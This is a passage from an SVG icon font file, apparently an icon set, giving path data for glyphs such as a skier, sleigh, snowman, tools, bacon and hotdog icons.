d="M432 352c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48zM505 -4.09961c9.2998 -9.30078 9.2998 -24.5 0 -33.8008c-17 -17 -39.7998 -26 -63 -26c-12.5996 0 -25.2002 2.60059 -37.0996 8.10059l-391.9 202.5
c-11.7998 6 -16.4004 20.5 -10.2998 32.2998c6.09961 11.7998 20.5996 16.2998 32.2998 10.2998l197.9 -102.3l45.8994 68.7998l-75.0996 75.2002c-14.2998 14.4004 -20.6006 34.5 -17.7002 54.4004l107 -53.1006l40.4004 -40.5
c16.1992 -16.0996 18.6992 -41.5996 6 -60.5996l-49.2002 -73.7998l135.8 -70.2002c14.5996 -6.7002 33 -3.40039 45.0996 8.7002c9.30078 9.39941 24.5 9.39941 33.9004 0zM120 356.4l-26.2002 23c-2.2002 1.89941 -2.39941 5.19922 -0.5 7.39941
c1.2998 1.5 3.2002 2.10059 5 1.7002l34.4004 -7h0.200195l11.0996 21.7002c13.7002 -7 21.2002 -21.1006 20.9004 -35.6006l62.5 -31l81.1992 32.5c43.6006 17.4004 76.4004 -15 84.5 -39.1992l17.1006 -51.2002l52.0996 -26.1006
c15.7998 -7.89941 22.2002 -27.0996 14.2998 -42.8994c-7.89941 -15.7998 -27 -22.2002 -42.8994 -14.2998l-58.1006 29c-11.3994 5.69922 -20 15.5996 -24 27.6992l-6.39941 19.1006l-32.4004 -13l-114.5 56.7998c0.100586 0.0996094 0.100586 0.200195 0.200195 0.299805
l-47.2002 23.4004c-11.5996 -9.7002 -28.3994 -12.1006 -42.7998 -4.7998z" />
    <glyph glyph-name="skiing-nordic" unicode="&#xf7ca;" horiz-adv-x="576" 
d="M336 352c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48zM552 32c13.2002 0 24 -10.7998 24 -24c0 -39.7002 -32.2998 -72 -72 -72h-480c-13.2002 0 -24 10.7002 -24 24s10.7998 24 24 24h42.9004l54.0996 270.8
c-0.700195 0.799805 -1.7002 1.2002 -2.40039 2.10059c-10.7998 14.0996 -8.09961 34.1992 5.90039 44.8994l39.7002 30.4004c23 17.5996 52.5 23.8994 80.7998 17.0996l71.2002 -21.2002c26.2998 -6.69922 49.2998 -25.3994 61.7998 -50.8994l26.0996 -53.2002h44
c17.7002 0 32 -14.2998 32 -32c0 -13.4004 -8.39941 -24.9004 -20.0996 -29.5996l-25.5 -178.4h69.5c13.2002 0 24 10.7998 24 24c0 13.2998 10.7998 24 24 24zM291.5 -16l25.5 81.2002l-85 50.2002c-27.5996 16.2998 -38.9004 50.7998 -26.2998 80.2998l37.5 87.3994
l-14.7002 4.40039c-7.90039 1.90039 -17.5996 -0.200195 -25.2998 -6.09961l-39.7002 -30.4004c-3.59961 -2.7002 -7.59961 -4.59961 -11.7002 -5.59961l-52.2998 -261.4h24.2002l62.5 131.8c7.59961 -10.8994 17.3994 -20.5996 29.5 -27.7998l22 -13l-43.1006 -91h96.9004z
M402.1 -16l25.2002 176h-33.2998c-18.2002 0 -35.0996 10.5996 -43.0996 26.9004l-20.3008 41.3994l-31.2998 -78.2998l61.2002 -36.0996c18.7002 -11.3008 27.5 -33.6006 21.5996 -54.4004l-23.5996 -75.5h43.5996z" />
    <glyph glyph-name="sleigh" unicode="&#xf7cc;" horiz-adv-x="640" 
d="M612.7 97.2998c18.5 -14.7002 28.5996 -37.2002 27.2002 -61c-2.2002 -39 -36.9004 -68.2998 -75.9004 -68.2998h-516c-8.7998 0 -16 7.2002 -16 16v16c0 8.7998 7.2002 16 16 16h519.3c13.6006 0 24.6006 11 24.6006 24.5996c0 7.5 -3.30078 14.5 -9.2002 19.2002
l-9.2998 7.40039c-6.90039 5.5 -8 15.5996 -2.5 22.5l10 12.5c5.5 6.89941 15.5996 8 22.5 2.5zM32 224v128c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32h20.7002c65.7002 0 125.899 -37.2002 155.3 -96s89.5 -96 155.3 -96h20.7002c35.2998 0 64 28.7002 64 64v64h96
c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32v-96c0 -53 -43 -96 -96 -96v-48h-64v48h-192v-48h-64v52.5c-55.0996 14.2998 -96 63.9004 -96 123.5z" />
    <glyph glyph-name="sms" unicode="&#xf7cd;" 
d="M256 416c141.4 0 256 -93.0996 256 -208s-114.6 -208 -256 -208c-38.4004 0 -74.7002 7.09961 -107.4 19.4004c-24.5996 -19.6006 -74.2998 -51.4004 -140.6 -51.4004c-3.2002 0 -6 1.7998 -7.2998 4.7998s-0.700195 6.40039 1.5 8.7002
c0.5 0.5 42.2998 45.4004 54.7998 95.7998c-35.5996 35.7002 -57 81.1006 -57 130.7c0 114.9 114.6 208 256 208zM128.2 144c23.3994 0 42.5 17.2998 42.3994 38.5996c0 10.6006 -4.7998 20.9004 -13.2998 28.1006l-21.8994 18.7998
c-1.30078 1.09961 -2.10059 2.5 -2.10059 3.7998c0 3.10059 4.40039 6.60059 10.4004 6.60059h12.2998c4.40039 0 8 3.59961 8 8v16c0 4.39941 -3.59961 8 -8 8h-12.2002c-23.3994 0 -42.3994 -17.3008 -42.3994 -38.6006c0 -10.5996 4.7998 -20.8994 13.2998 -28.0996
l21.8994 -18.7998c1.30078 -1.10059 2.10059 -2.5 2.10059 -3.80078c0 -3.09961 -4.40039 -6.59961 -10.4004 -6.59961h-12.2998c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h12.2002zM320 152v104c0 8.7998 -7.2002 16 -16 16h-16
c-6 0 -11.5996 -3.40039 -14.2998 -8.7998l-17.7002 -35.4004l-17.7002 35.4004c-2.7002 5.39941 -8.2002 8.7998 -14.2998 8.7998h-16c-8.7998 0 -16 -7.2002 -16 -16v-104c0 -4.40039 3.59961 -8 8 -8h16c4.40039 0 8 3.59961 8 8v68.2002l24.9004 -55.7998
c2.89941 -5.90039 11.3994 -5.90039 14.2998 0l24.7998 55.7998v-68.2002c0 -4.40039 3.59961 -8 8 -8h16c4.40039 0 8 3.59961 8 8zM368.3 144c23.4004 0 42.4004 17.2998 42.2998 38.5996c0 10.6006 -4.7998 20.9004 -13.2998 28.1006l-21.8994 18.7998
c-1.30078 1.09961 -2.10059 2.5 -2.10059 3.7998c0 3.10059 4.40039 6.60059 10.4004 6.60059h12.2998c4.40039 0 8 3.59961 8 8v16c0 4.39941 -3.59961 8 -8 8h-12.2002c-23.3994 0 -42.3994 -17.3008 -42.3994 -38.6006c0 -10.5996 4.7998 -20.8994 13.2998 -28.0996
l21.8994 -18.7998c1.30078 -1.10059 2.10059 -2.5 2.10059 -3.80078c0 -3.09961 -4.40039 -6.59961 -10.4004 -6.59961h-12.2998c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h12.2998z" />
    <glyph glyph-name="snowboarding" unicode="&#xf7ce;" 
d="M432 352c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48zM460.8 198.4l-83.5 62.8994l-66 -30.5l52 -39c14.9004 -11.2002 22 -30.2002 18.1006 -48.3994l-21.9004 -102c-2.2002 -10.1006 -9.09961 -17.8008 -17.7998 -21.9004
l90.7998 -33.0996c9.7002 -3.5 20.2002 -3.10059 29.5 1.2998c12 5.59961 26.2998 0.399414 31.9004 -11.6006c5.59961 -12 0.399414 -26.2998 -11.6006 -31.8994c-11.5996 -5.5 -24 -8.2002 -36.5 -8.2002c-10 0 -20 1.7998 -29.7002 5.2998l-364.8 132.7
c-21.7998 7.90039 -39.0996 23.7998 -48.8994 44.7998c-5.60059 12 -0.400391 26.2998 11.5996 31.9004c12 5.59961 26.2998 0.399414 31.9004 -11.6006c4.39941 -9.39941 12.0996 -16.5 21.7998 -20l38.7002 -14.0996c-3.80078 3.5 -7 7.7002 -8.7002 12.9004
c-5.60059 16.7998 3.39941 34.8994 20.2002 40.5l74.0996 24.6992v53.1006c0 24.3994 13.5996 46.2998 35.4004 57.2002l41.1992 20.5996l-16.3994 5.5c-12.1006 4.09961 -22 12.5996 -27.7002 24l-29.0996 58.0996c-7.90039 15.8008 -1.5 35 14.2998 42.9004
s35 1.5 42.8994 -14.2998l26.1006 -52.1006l63.7002 -21.1992c16.2998 -5.40039 31.5996 -13.5 45.3994 -23.8008l111.4 -83.5c14.2002 -10.5996 17 -30.6992 6.39941 -44.7998c-6.2998 -8.39941 -15.8994 -12.7998 -25.5996 -12.7998
c-6.7002 0 -13.4004 2.09961 -19.2002 6.40039zM316.4 146.7l-60.5 45.2998v-20.5c0 -20.7002 -13.2002 -39 -32.8008 -45.5l-85 -28.4004c-2.59961 -0.899414 -5.2998 -1.09961 -8 -1.2998l169.4 -61.5996c-2.90039 6.09961 -4.2998 12.8994 -2.7998 20z" />
    <glyph glyph-name="snowman" unicode="&#xf7d0;" 
d="M510.9 295.7c3.19922 -8.10059 -0.800781 -17.2002 -8.90039 -20.2998l-135.2 -55.2002c0.400391 -4.10059 1.2002 -8 1.2002 -12.2002c0 -10 -1.7002 -19.5 -4.2002 -28.7002c21.1006 -21.3994 36.1006 -48.7998 41.6006 -79
c11.5 -63.2002 -16.4004 -120.3 -62.9004 -152.6c-10.9004 -7.60059 -23.9004 -11.7002 -37.2002 -11.7002h-99.2002c-11 0 -22 2.2998 -31.2998 8.2002c-42.3994 26.8994 -70.7998 73.7998 -70.7998 127.8c0 41.7998 16.9004 79.5996 44.2998 107.1
c-2.5 9.30078 -4.2002 18.8008 -4.2002 28.9004c0 4.2002 0.800781 8.2002 1.2002 12.2002l-135.2 55.2002c-8.19922 3.19922 -12.1992 12.2998 -8.89941 20.2998l5.89941 14.5c3.30078 8 12.6006 11.8994 20.8008 8.7002l28.0996 -11.5v29
c0 8.59961 7.2002 15.5996 16 15.5996h16c8.7998 0 16 -7 15.7998 -15.5996v-46.9004c0 -0.5 -0.200195 -1 -0.299805 -1.5l56.4004 -23c6 10 13.2998 18.9004 22 26.5996c-13.5 16.6006 -22 37.4004 -22 60.5c0 53 43 96 96 96s96 -43 96 -96
c0 -23.0996 -8.40039 -43.8994 -22 -60.5c8.69922 -7.69922 16.0996 -16.5996 22 -26.5996l56.3994 23c0 0.5 -0.299805 1 -0.299805 1.5v46.9004c0 8.59961 7.2002 15.5996 16 15.5996h16c8.7998 0 16 -7 16 -15.5996v-29l28.2002 11.5
c8.2002 3.19922 17.5 -0.700195 20.7998 -8.7002zM224 352c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM256 80c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM256 144
c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM256 208c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM256 296c0 0 16 23.2002 16 32s-7.2002 16 -16 16s-16 -7.2002 -16 -16s16 -32 16 -32z
M288 352c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16z" />
    <glyph glyph-name="snowplow" unicode="&#xf7d2;" horiz-adv-x="639" 
d="M120 72c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM200 72c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM280 72c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24
s-24 10.7002 -24 24s10.7002 24 24 24zM360 72c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM598.6 22.5996l36.7002 -36.6992c6.2002 -6.2002 6.2002 -16.4004 0 -22.6006l-22.5996 -22.5996
c-6.2002 -6.2002 -16.4004 -6.2002 -22.6006 0l-36.6992 36.7002c-26.5 26.5 -41.4004 62.3994 -41.4004 99.8994v18.7002h-43.2002c7 -14.5996 11.2002 -30.7002 11.2002 -48c0 -61.9004 -50.0996 -112 -112 -112h-256c-61.9004 0 -112 50.0996 -112 112
c0 44.5996 26.2998 82.7998 64 100.8v91.2002c0 26.5 21.5 48 48 48h16v112c0 26.5 21.5 48 48 48h144.3c19.2998 0 36.6006 -11.4004 44.2002 -29.0996l78.2998 -182.801c3.40039 -8 5.2002 -16.5 5.2002 -25.1992v-50.9004h64v18.7002
c0 37.5 14.9004 73.3994 41.4004 99.8994l36.6992 36.7002c6.2002 6.2002 16.4004 6.2002 22.6006 0l22.5996 -22.5996c6.2002 -6.2002 6.2002 -16.4004 0 -22.6006l-36.7002 -36.6992c-14.5 -14.5 -22.5996 -34.1006 -22.5996 -54.6006v-101.6
c0 -20.5 8.09961 -40.1006 22.5996 -54.6006zM192 384v-96l64 -64h122.4l-68.6006 160h-117.8zM368 0c26.5 0 48 21.5 48 48s-21.5 48 -48 48h-256c-26.5 0 -48 -21.5 -48 -48s21.5 -48 48 -48h256z" />
    <glyph glyph-name="tenge" unicode="&#xf7d7;" horiz-adv-x="384" 
d="M372 288c6.59961 0 12 -5.40039 12 -12v-56c0 -6.59961 -5.40039 -12 -12 -12h-140v-228c0 -6.59961 -5.40039 -12 -12 -12h-56c-6.59961 0 -12 5.40039 -12 12v228h-140c-6.59961 0 -12 5.40039 -12 12v56c0 6.59961 5.40039 12 12 12h360zM372 416
c6.59961 0 12 -5.40039 12 -12v-56c0 -6.59961 -5.40039 -12 -12 -12h-360c-6.59961 0 -12 5.40039 -12 12v56c0 6.59961 5.40039 12 12 12h360z" />
    <glyph glyph-name="toilet" unicode="&#xf7d8;" horiz-adv-x="384" 
d="M368 400h-16v-156.7c20.2002 -10.0996 32 -22.2002 32 -35.2998c0 -67.2002 -34.5996 -126.2 -86.7998 -160.5l21.3994 -70.2002c6.30078 -20.5 -9.09961 -41.2998 -30.5996 -41.2998h-192c-21.5 0 -36.9004 20.7998 -30.5996 41.2998l21.3994 70.2002
c-52.2002 34.2998 -86.7998 93.2998 -86.7998 160.5c0 13.0996 11.7998 25.2002 32 35.2998v156.7h-16c-8.7998 0 -16 7.2002 -16 16v16c0 8.7998 7.2002 16 16 16h352c8.7998 0 16 -7.2002 16 -16v-16c0 -8.7998 -7.2002 -16 -16 -16zM80 376v-16
c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8zM192 176c77.0996 0 139.6 14.2998 139.6 32s-62.5 32 -139.6 32s-139.6 -14.2998 -139.6 -32s62.5 -32 139.6 -32z" />
    <glyph glyph-name="tools" unicode="&#xf7d9;" 
d="M501.1 52.2998c14.5 -14.5 14.5 -38.0996 0 -52.7002l-52.6992 -52.6992c-14.5 -14.6006 -38.1006 -14.6006 -52.7002 0l-117.101 117.1c-23.0996 23.0996 -27.5 57.5996 -13.8994 85.4004l-106.601 106.6h-62.0996l-96 128l64 64l128 -96v-62.0996l106.6 -106.601
c27.8008 13.7002 62.3008 9.2002 85.4004 -13.8994zM331.7 223c-8.2002 0 -16.6006 -1 -24.7002 -2.90039l-82.0996 82.1006c-0.700195 37.5 12.6992 75.0996 41.1992 103.6c37 37 89.2002 49.6006 136.601 37.9004c9.09961 -2.2998 12.2998 -13.6006 5.7002 -20.2002
l-74.4004 -74.4004l11.2998 -67.8994l67.9004 -11.2998l74.3994 74.3994c6.60059 6.60059 17.9004 3.5 20.1006 -5.5c11.7998 -47.3994 -0.799805 -99.5996 -37.9004 -136.7c-13 -13 -28 -22.5996 -43.7998 -29.5l-19.4004 19.4004c-20 20 -46.5996 31 -74.8994 31z
M227.8 141c-4.89941 -21.0996 -2.59961 -42.7998 5 -62.7002l-123.6 -123.6c-25 -25 -65.5 -25 -90.5 0s-25 65.5 0 90.5l152.399 152.5zM64 -24c13.2998 0 24 10.7998 24 24c0 13.2998 -10.7002 24 -24 24s-24 -10.7002 -24 -24c0 -13.2002 10.7998 -24 24 -24z" />
    <glyph glyph-name="tram" unicode="&#xf7da;" 
d="M288 384c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM511.5 396.1c2.2002 -8.5 -2.7998 -17.2998 -11.4004 -19.5996l-228.1 -60.7998v-91.7002h176c17.7002 0 32 -14.2998 32 -32v-224c0 -17.7002 -14.2998 -32 -32 -32
h-384c-17.7002 0 -32 14.2998 -32 32v224c0 17.7002 14.2998 32 32 32h176v83.2002l-219.9 -58.7002c-1.2998 -0.299805 -2.69922 -0.5 -4.09961 -0.5c-7.09961 0 -13.5 4.7002 -15.4004 11.7998c-2.2998 8.60059 2.80078 17.2998 11.3008 19.6006l480 128
c8.59961 2.2998 17.2998 -2.7002 19.5996 -11.3008zM176 64v96h-96v-96h96zM336 160v-96h96v96h-96zM304 160h-96v-96h96v96zM192 352c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32z" />
    <glyph glyph-name="fire-alt" unicode="&#xf7e4;" horiz-adv-x="448" 
d="M323.56 396.8c72.46 -67.2598 124.44 -177.13 124.44 -230.399c0 -127.25 -100.29 -230.4 -224 -230.4s-224 103.15 -224 230.4c0 71.6396 69.7402 190.43 168 281.6c38.2803 -35.5303 72.0801 -73.6201 99.3398 -111.17
c16.6406 20.3799 35.4199 40.6699 56.2197 59.9697zM304.09 56.1504c49.2402 34.4492 60.7803 101.229 33.4297 153.42c-3.35938 6.41992 -7.12988 13.1201 -11.2695 19.9697l-58.6299 -66.8799s-91.9004 117.359 -98.8301 125.34
c-48.4805 -58.1201 -72.79 -92.1396 -72.79 -130.75c0 -77.5098 58.71 -125.25 130.86 -125.25c28.8594 0 55.5693 8.99023 77.2295 24.1504z" />
    <glyph glyph-name="bacon" unicode="&#xf7e5;" horiz-adv-x="576" 
d="M218.92 111.61c-34.8604 -34.8799 -59.6504 -44.1602 -85.9199 -54c-26 -9.76074 -53 -20.1299 -88.1699 -52.7305l-35.7598 35.5098c-12.7002 12.6104 -12.0703 33.6104 1.79004 45.0605c36.3398 29.9795 66.21 41.0996 91.0693 50.3594
c9.16992 3.41016 68.9707 19.2607 98.7207 98.0908c8.60938 22.8096 46.3496 134.58 188.979 187.72c15.8506 5.91016 27.3604 10.2002 41 20.2998c4.53516 3.35449 12.7939 6.07617 18.4346 6.07617c7.00879 0 16.751 -3.98926 21.7451 -8.90625l37.6709 -37.3896
c-30.1504 -27.6904 -52.9102 -36.3701 -76.79 -45.3701c-28.3008 -10.6104 -57.5703 -21.5801 -97.3506 -61.3799s-50.7598 -69.0498 -61.3701 -97.3398c-9.84961 -26.3008 -19.1602 -51.1104 -54.0498 -86zM566.92 343.61
c12.7002 -12.5996 12.0801 -33.6602 -1.80957 -45.0605c-36.3701 -30.0098 -66.2402 -41.1396 -91.1104 -50.4102c-9.2002 -3.43945 -69 -19.3193 -98.7305 -98.1094c-8.93945 -23.5898 -46.7393 -134.69 -188.939 -187.69
c-15.8496 -5.89941 -27.3398 -10.1797 -40.9404 -20.2402c-4.53613 -3.35645 -12.7969 -6.08008 -18.4395 -6.08008c-7.00586 0 -16.7461 3.9873 -21.7402 8.90039l-37.6797 37.4297c30.1094 27.6699 52.8594 36.3301 76.7197 45.3301
c28.2998 10.5898 57.5098 21.54 97.2998 61.3203s50.7803 69 61.4199 97.3301c9.81055 26.3096 19.1104 51.1602 54 86c34.8906 34.8398 59.6904 44.1504 85.9502 54c26.0703 9.79004 53.0605 20.1602 88.25 52.79z" />
    <glyph glyph-name="book-medical" unicode="&#xf7e6;" horiz-adv-x="448" 
d="M448 89.5996c0 -9.59961 -3.2002 -15.999 -9.59961 -19.1992c-3.2002 -12.8008 -3.2002 -57.6006 0 -73.6006c6.39941 -6.39941 9.59961 -12.7998 9.59961 -19.2002v-16c0 -16 -12.7998 -25.5996 -25.5996 -25.5996h-326.4c-54.4004 0 -96 41.5996 -96 96v320
c0 54.4004 41.5996 96 96 96h326.4c16 0 25.5996 -9.59961 25.5996 -25.5996v-332.801zM144 280v-48c0 -4.41602 3.58398 -8 8 -8h56v-56c0 -4.41602 3.58398 -8 8 -8h48c4.41602 0 8 3.58398 8 8v56h56c4.41602 0 8 3.58398 8 8v48c0 4.41602 -3.58398 8 -8 8h-56v56
c0 4.41602 -3.58398 8 -8 8h-48c-4.41602 0 -8 -3.58398 -8 -8v-56h-56c-4.41602 0 -8 -3.58398 -8 -8zM380.8 0v64h-284.8c-16 0 -32 -12.7998 -32 -32s12.7998 -32 32 -32h284.8z" />
    <glyph glyph-name="bread-slice" unicode="&#xf7ec;" horiz-adv-x="576" 
d="M288 448c180 0 288 -93.4004 288 -169.14c0 -30.3008 -24.2402 -54.8604 -64 -54.8604v-256c0 -17.6699 -16.1201 -32 -36 -32h-376c-19.8799 0 -36 14.3301 -36 32v256c-39.7598 0 -64 24.5596 -64 54.8604c0 75.7393 108 169.14 288 169.14z" />
    <glyph glyph-name="cheese" unicode="&#xf7ef;" 
d="M0 160h512v-160c0 -17.6641 -14.3359 -32 -32 -32h-448c-17.6641 0 -32 14.3359 -32 32v160zM299.83 416c118.17 -6.2002 212.17 -104.11 212.17 -224h-512l278.7 217c4.83984 3.875 13.7998 7.01953 20 7.01953c0.311523 0 0.818359 -0.00878906 1.12988 -0.0195312z
" />
    <glyph glyph-name="clinic-medical" unicode="&#xf7f2;" horiz-adv-x="576" 
d="M288 333l218.74 -192.9c1.54004 -1.37988 3.55957 -2.04004 5.25977 -3.19922v-184.9c0 -8.83203 -7.16797 -16 -16 -16h-416c-8.83203 0 -16 7.16797 -16 16v184.94c1.78027 1.20996 3.84961 1.88965 5.46973 3.34961zM384 72v48c0 4.41602 -3.58398 8 -8 8h-56v56
c0 4.41602 -3.58398 8 -8 8h-48c-4.41602 0 -8 -3.58398 -8 -8v-56h-56c-4.41602 0 -8 -3.58398 -8 -8v-48c0 -4.41602 3.58398 -8 8 -8h56v-56c0 -4.41602 3.58398 -8 8 -8h48c4.41602 0 8 3.58398 8 8v56h56c4.41602 0 8 3.58398 8 8zM570.69 211.72
c2.93066 -2.63184 5.31055 -7.96484 5.31055 -11.9053c0 -3.38086 -1.83301 -8.16797 -4.09082 -10.6846l-21.4004 -23.8203c-2.63184 -2.93066 -7.96484 -5.30957 -11.9043 -5.30957c-3.38574 0 -8.17773 1.83691 -10.6953 4.09961l-229.32 202.271
c-2.50391 2.20898 -7.24609 4.00195 -10.585 4.00195s-8.08105 -1.79297 -10.585 -4.00195l-229.32 -202.28c-2.51758 -2.2627 -7.30957 -4.09961 -10.6953 -4.09961c-3.93848 0 -9.27246 2.37891 -11.9043 5.30957l-21.4102 23.8203
c-2.2627 2.51758 -4.09961 7.30957 -4.09961 10.6953c0 3.93945 2.37891 9.27246 5.30957 11.9043l256 226c6.2832 5.68066 18.2559 10.29 26.7256 10.29c8.46875 0 20.4424 -4.60938 26.7246 -10.29z" />
    <glyph glyph-name="comment-medical" unicode="&#xf7f5;" 
d="M256 416c141.39 0 256 -93.1201 256 -208s-114.61 -208 -256 -208h-0.473633c-30.4814 0 -78.3838 8.68164 -106.927 19.3799c-24.5996 -19.6299 -74.3398 -51.3799 -140.6 -51.3799c-4.41113 0.00488281 -7.99023 3.58887 -7.99023 8
c0 1.75879 0.981445 4.22266 2.19043 5.5c0.5 0.5 42.2598 45.4502 54.7998 95.7598c-35.5898 35.7402 -57 81.1807 -57 130.74c0 114.88 114.62 208 256 208zM352 184v48c0 4.41602 -3.58398 8 -8 8h-56v56c0 4.41602 -3.58398 8 -8 8h-48c-4.41602 0 -8 -3.58398 -8 -8
v-56h-56c-4.41602 0 -8 -3.58398 -8 -8v-48c0 -4.41602 3.58398 -8 8 -8h56v-56c0 -4.41602 3.58398 -8 8 -8h48c4.41602 0 8 3.58398 8 8v56h56c4.41602 0 8 3.58398 8 8z" />
    <glyph glyph-name="crutch" unicode="&#xf7f7;" horiz-adv-x="511" 
d="M507.31 262.29c2.56348 -2.58301 4.64355 -7.63184 4.64355 -11.2695c0 -3.66602 -2.10742 -8.74219 -4.70312 -11.3301l-22.6201 -22.6309c-2.58691 -2.58691 -7.65625 -4.6875 -11.3145 -4.6875c-3.65918 0 -8.72852 2.10059 -11.3154 4.6875l-181 181
c-2.58789 2.58691 -4.6875 7.65625 -4.6875 11.3154s2.09961 8.72852 4.6875 11.3154l22.6904 22.5996c2.58594 2.58496 7.65332 4.68262 11.3096 4.68262s8.72363 -2.09766 11.3096 -4.68262zM327.77 195.88l55.1006 55.1201l45.25 -45.2695l-109.68 -109.681
c-10.7441 -10.748 -31.4814 -22.2393 -46.29 -25.6494l-120.25 -27.75l-102 -102c-2.58691 -2.58789 -7.65625 -4.6875 -11.3154 -4.6875s-8.72754 2.09961 -11.3154 4.6875l-22.6191 22.6191c-2.58789 2.58789 -4.6875 7.65625 -4.6875 11.3154
s2.09961 8.72852 4.6875 11.3154l102 102l27.7393 120.26c3.4248 14.8057 14.9248 35.5439 25.6699 46.29l109.671 109.67l45.25 -45.25l-55.1006 -55.1006zM273.2 141.31l9.30957 9.31055l-67.8896 67.8896l-9.31055 -9.30957
c-3.57715 -3.59082 -7.41211 -10.5127 -8.55957 -15.4502l-18.2998 -79.2998l79.2998 18.3193c4.94043 1.13379 11.8623 4.95996 15.4502 8.54004z" />
    <glyph glyph-name="egg" unicode="&#xf7fb;" horiz-adv-x="384" 
d="M192 448c106 0 192 -214 192 -320s-86 -192 -192 -192s-192 86 -192 192s86 320 192 320z" />
    <glyph glyph-name="hamburger" unicode="&#xf805;" 
d="M464 192c26.4961 0 48 -21.5039 48 -48s-21.5039 -48 -48 -48h-416c-26.4961 0 -48 21.5039 -48 48s21.5039 48 48 48h416zM480 64c8.83203 0 16 -7.16797 16 -16v-16c0 -35.3281 -28.6719 -64 -64 -64h-352c-35.3281 0 -64 28.6719 -64 64v16
c0 8.83203 7.16797 16 16 16h448zM58.6396 224c-34.5693 0 -54.6396 43.9102 -34.8193 75.8896c40.1797 64.9102 128.64 116.011 232.18 116.11c103.55 -0.0996094 192 -51.2002 232.18 -116.12c19.8008 -31.9795 -0.25 -75.8799 -34.8193 -75.8799h-394.721zM384 336
c-8.83203 0 -16 -7.16797 -16 -16s7.16797 -16 16 -16s16 7.16797 16 16s-7.16797 16 -16 16zM256 368c-8.83203 0 -16 -7.16797 -16 -16s7.16797 -16 16 -16s16 7.16797 16 16s-7.16797 16 -16 16zM128 336c-8.83203 0 -16 -7.16797 -16 -16s7.16797 -16 16 -16
s16 7.16797 16 16s-7.16797 16 -16 16z" />
    <glyph glyph-name="hand-middle-finger" unicode="&#xf806;" 
d="M479.93 130.88l0.0703125 -82.8799v0c0 -61.7969 -50.1533 -111.973 -111.95 -112h-215c-25.6074 0.00292969 -61.084 14.7012 -79.1895 32.8096l-30.9307 30.9307c-6.0332 6.03223 -10.9297 17.8525 -10.9297 26.3838v0.00585938v73.4697v0.00292969
c0 12.7383 9.24707 27.7002 20.6396 33.3975l27.3604 15v-76c0 -4.41602 3.58398 -8 8 -8s8 3.58398 8 8v147.04c0 15.2598 12.8701 28.3799 30.8701 31.3799l30.6797 5.12012c17.8203 2.96973 34.4502 -8.38965 34.4502 -23.54v-32c0 -4.41602 3.58398 -8 8 -8
s8 3.58398 8 8v200v0.0224609c0 26.4961 21.5039 48 48 48c0.408203 0 1.07129 -0.00976562 1.48047 -0.0224609c26.2695 -0.799805 46.5195 -23.7197 46.5195 -50v-198c0 -4.41602 3.58398 -8 8 -8s8 3.58398 8 8v32c0 15.1396 16.6299 26.5 34.4502 23.5303
l38.3994 -6.40039c13.46 -2.25 23.1504 -12.0996 23.1504 -23.54v-49.5898l35.6504 -8.92969c15.5986 -3.89844 28.2686 -20.1113 28.2793 -36.1904z" />
    <glyph glyph-name="hard-hat" unicode="&#xf807;" 
d="M480 160v-64h-448v64c0 80.25 49.2803 148.92 119.19 177.62l40.8096 -81.6201v112c0 8.83203 7.16797 16 16 16h96c8.83203 0 16 -7.16797 16 -16v-112l40.8096 81.6201c69.9102 -28.7002 119.19 -97.3701 119.19 -177.62zM496 64c8.83203 0 16 -7.16797 16 -16v-32
c0 -8.83203 -7.16797 -16 -16 -16h-480c-8.83203 0 -16 7.16797 -16 16v32c0 8.83203 7.16797 16 16 16h480z" />
    <glyph glyph-name="hotdog" unicode="&#xf80f;" 
d="M488.56 424.56c12.9297 -12.9326 23.4238 -38.2715 23.4238 -56.5596s-10.4941 -43.627 -23.4238 -56.5596l-352 -352c-13.0205 -13.4824 -38.7998 -24.4238 -57.543 -24.4238c-44.1592 0 -80 35.8408 -80 80c0 18.7432 10.9414 44.5225 24.4238 57.543l352 352
c12.9326 12.9297 38.2715 23.4238 56.5596 23.4238s43.627 -10.4941 56.5596 -23.4238zM438.63 329.37c2.58691 2.58691 4.68652 7.65625 4.68652 11.3145c0 8.83301 -7.16797 16.002 -16.001 16.002c-3.65918 0 -8.72852 -2.09961 -11.3154 -4.68652
c-12.4102 -12.4102 -21.7598 -14 -34.71 -16.2305c-14.4004 -2.46973 -32.3203 -5.55957 -51.9199 -25.1494c-19.6006 -19.5898 -22.6699 -37.5205 -25.1396 -51.9199c-2.24023 -12.9502 -3.84082 -22.3105 -16.2402 -34.71
